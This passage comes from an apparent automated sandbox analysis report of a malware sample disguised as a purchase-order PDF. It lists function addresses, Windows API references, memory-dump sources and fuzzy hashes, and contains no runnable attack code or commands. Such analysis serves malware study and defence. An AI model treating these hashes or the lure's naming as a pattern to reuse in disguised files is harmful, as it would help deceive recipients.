                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                                                                                                                                                                                            Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __lock_file_memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 26237723-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                            • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                                                                                                                                                                                            Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                                                                                                                                                                                            • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 717694121-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                                                                            • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                                                                                                                                                                                            Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1706434739-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                                                                                                                                                                                                                                            Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1706434739-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                                                                                                                                                                                                            • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                                                                                                                                                                                                                                            Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                            • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                                                                                                                                                                                            Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4308273726a8cf553c97676f4e4ed14cf105674e43f0e6cd586214b84984ce81
                                                                                                                                                                                                                                                                                                            • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4308273726a8cf553c97676f4e4ed14cf105674e43f0e6cd586214b84984ce81
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                                                                                                                                                                                            Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                            • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                                                                                                                                                                                            Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                                                                                                                                                                                            Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                                                                                                                                                                                            Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                                                                                                                                                                                            Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wfsopen
